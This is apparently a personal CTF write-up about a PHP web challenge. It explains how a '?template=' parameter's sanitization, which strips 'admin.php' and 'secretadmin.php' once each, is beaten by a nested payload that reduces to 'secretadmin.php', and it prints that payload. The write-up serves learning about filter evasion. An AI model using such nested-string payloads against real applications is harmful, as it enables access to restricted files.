![eaa601cd6ff295dbd681865f279d014c.png](5df6af9b3cfd410f8ea0eb5926cf30b3.png)
Dirbusting/fuzzing
`?template=index.php`
![79fded6c81e3b452b0b0328788167cc0.png](8f45ee8b15434726bf16ddcff86a5398.png)
Test the php code locally to figure out how to bypass the sanitization. turns out, it can be beaten by nesting
`secretadsecadmin.phpretadmadmin.phpin.phpmin.php`
this works because the code first removes all instances of `admin.php` so the above becomes
`secretadsecretadmin.phpmin.php`
And then, it removes all instances of `secretadmin.php` so the above becomes
`secretadmin.php`
![6cf3b74018621fd025c3cf3b442cdff8.png](9028d94738e4494abd1b2708d91c4dcc.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #php #filter_evasion #web
Related: